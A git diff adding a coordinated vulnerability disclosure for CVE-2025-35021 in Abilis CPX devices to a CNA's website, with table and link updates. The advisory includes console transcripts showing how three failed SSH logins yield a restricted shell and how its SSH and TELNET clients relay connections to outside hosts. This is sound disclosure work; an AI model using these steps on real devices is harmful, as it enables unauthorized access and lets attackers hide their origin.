diff --git a/content/cve.md b/content/cve.md
index 7d8b8fd..23be972 100644
--- a/content/cve.md
+++ b/content/cve.md
@@ -211,6 +211,7 @@ When we publish CVEs, we will tend to use this [template], adjusted to taste.
 | ----------------- | --------- | ------------------------------------------   | ---- |
 | [CVE-2025-8452]   | 0x00e2    | **Brother Printer Serial Number Disclosure** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001] |
 | [CVE-2025-35027]  | 0x00e4    | **Unitree Robotics Command Injection**      | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010] |
+| [CVE-2025-35021]  | 0x00e5  | **Abilis CPX Fallback Shell Connection Relay** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100] |
 </div>
 
 ## Reserved GCVEs
@@ -224,7 +225,6 @@ That said, starting in August of 2025, we've started to reserve [GCVEs](https://
 | Meeting | GCVE (Reserved) |
 |---------|-----------------|
 | 0x00e4  | GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011 |
-| 0x00e5  | GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100 |
 
 </div>
 
@@ -273,5 +273,7 @@ Vulnerabilities involving other parties must be either (1) presented at a regula
 [CVE-2025-35010]: {{< baseurl >}}cves/cve-2025-35010/
 [CVE-2025-8452]: {{< baseurl >}}cves/cve-2025-8452/
 [CVE-2025-35027]: {{< baseurl >}}cves/cve-2025-35027/
+[CVE-2025-35021]: {{< baseurl >}}cves/cve-2025-35021/
 [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001
 [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010
+[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100
diff --git a/content/cves/CVE-2025-35021.md b/content/cves/CVE-2025-35021.md
new file mode 100644
index 0000000..4ede489
--- /dev/null
+++ b/content/cves/CVE-2025-35021.md
@@ -0,0 +1,129 @@
+---
+title: CVE-2025-35021
+aliases:
+  - /cves/CVE-2025-35027.html
+  - /gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100
+publishDate: 2025-11-03T18:06:00-06:00
+
+---
+
+## CVE-2025-35021: Abilis CPX Fallback Shell Connection Relay
+
+[AHA!] has discovered an issue with Abilis CPX devices, and is publishing this disclosure in accordance with runZero's standard [disclosure policy] today, November 3, 2025. [CVE-2025-35021] has been assigned to this issue. Any questions about this disclosure should be directed to cve@takeonme.org.
+
+The [GCVE](https://gcve.eu/about/) identifier for this issue is <span style="white-space: nowrap;">[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100]</span>
+
+# Executive Summary
+
+By failing to authenticate three times to an unconfigured Abilis CPX device via SSH, an attacker can login to a restricted shell on the fourth attempt, and from there, relay connections. This issue is an instance of [CWE-1188](https://cwe.mitre.org/data/definitions/1188.html), 'Initialization of a Resource with an Insecure Default,' and is estimated to have a CVSS 3.1 score of [6.5](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N). The relevant [SSVC] vectors for this vulnerability are *Exploitation: PoC* and *Technical Impact: Partial*.
+
+# Technical Details
+
+A number of Abilis CPX devices drop to a fallback shell after three unsuccessful login attempts, if the device is not already configured with an SSH password. This shell allows outbound sessions from the device.
+
+In the example console session below, three known-incorrect logins (`bad`) are offered to an affected device before being dropped to the `SSHS` prompt.
+
+```
+$ ssh root@[TARGET]
+root@TARGET's password:
+
+COM
+
+Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10 - Abilis ID NNNNNNN
+Tuesday 19/08/2025 06:07:48 (UTC+02:00) - UpTime 2 days 11:20:42
+Login: bad
+
+PERMISSION DENIED
+
+Login: bad
+
+PERMISSION DENIED
+
+Login: bad
+
+PERMISSION DENIED
+
+
+CLR F0 AE
+
+[192.168.11.002] SSHS>
+```
+
+At this point, we are in the `SSHS` shell. This is a restricted shell, though it can be used as a relay to other systems. The below example uses the `SSHC` shell:
+
+```
+[192.168.11.002]help
+CP             Open connection to local CP resource
+SSH            Open connection to local SSH client
+TELNET         Open connection to local TELNET client
+<CD>-<UD>      Open X25 call with CD and UD
+CLR            Close connection
+CLOSE          Close SSH Session
+EXIT           Close SSH Session
+HELP           Show current help
+[192.168.11.002] SSHS>SSH
+[192.168.11.002] SSHC>
+[192.168.11.002] SSHC>OPEN 8.8.8.8:53
+Trying 8.8.8.8:53 ... Open
+
+Version identification fault
+```
+
+Similar to the `SSHC` shell, the `TELNETC` shell offers another path to connection relaying, and does not require the service to handshake a particular way:
+```
+[192.168.11.002] SSHS>TELNET
+[192.168.11.002] TELNETC>
+[192.168.11.002]TELNETC>open 1.2.3.4:5678
+Trying 1.2.3.4:5678 ... Open
+```
+
+## Affected Products
+
+Affected versions of CPX devices include:
+
+* Abilis CPX - Ver. 7.4.10/STD - Build 3608.48
+* Abilis CPX - Ver. 8.10.2/STD - Build 4703.15 - Branch 8.10
+* Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10
+* Abilis CPX - Ver. 8.11.0/STD - Build 4715.15 - Branch 8.11
+* Abilis CPX - Ver. 8.11.11/STD - Build 4715.52 - Branch 8.11
+* Abilis CPX - Ver. 8.11.14/STD - Build 4715.57 - Branch 8.11
+* Abilis CPX - Ver. 8.11.2/STD - Build 4715.19 - Branch 8.11
+* Abilis CPX - Ver. 8.11.5/STD - Build 4715.28 - Branch 8.11
+* Abilis CPX - Ver. 9.0.0/STD - Build 4957.3 - Branch 9.0
+
+Across these devices, affected SSH banners include:
+
+* SSH-1.99-CPX SSH Server
+* SSH-2.0-CPX SSH Server
+
+## Mitigation
+
+According to the vendor, setting a password to the SSH service will effectively remedy this behavior. Furthermore, firmware version 9.0.7 has been released so users can no longer accidentally expose an effectively no-authentication relay service.
+
+# Attacker Value
+
+By providing a pivot point to relay connections, attackers can use affected CPX devices to effectively shield their true originating IP address when launching attacks against other targets.
+
+# Credit
+
+This issue was discovered by [HD Moore](https://www.runzero.com/authors/hd-moore) and disclosure was coordinated by [Tod Beardsley](https://www.runzero.com/authors/tod-beardsley/) through the [AHA!] CNA.
+
+# Timeline
+
+* 2025-08-09 (Sat): Briefly demoed at [Def Con 33] in the presentation, [Shaking Out Shells with SSHamble]
+* 2025-08-19 (Tue): Initial contact to the vendor at info@antek.it
+* 2025-08-20 (Wed): Provided technical details to the vendor
+* 2025-08-22 (Fri): Vendor acknowledged the vulnerability as a configuration issue
+* 2025-10-21 (Tue): Vendor released [Abilis firmware update 9.0.7](https://support.abilis.net/relnotes/cpx2k/R9.0.html#R9.0.7)
+* 2025-10-30 (Thu): Findings presented at AHA! Meeting 0x00e5 and [CVE-2025-35021] reserved
+* 2025-11-03 (Mon): This public disclosure
+
+----
+
+[AHA!]: https://takeonme.org
+[disclosure policy]: https://takeonme.org/cve.html
+[CVE-2025-35021]: https://www.cve.org/CVERecord?id=CVE-2025-35021
+[SSVC]: https://www.cisa.gov/stakeholder-specific-vulnerability-categorization-ssvc
+[Def Con 33]: https://www.youtube.com/watch?v=XHoH4ic8fX8
+[Shaking Out Shells with SSHamble]: https://www.runzero.com/def-con-33-hd-moore/
+[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100
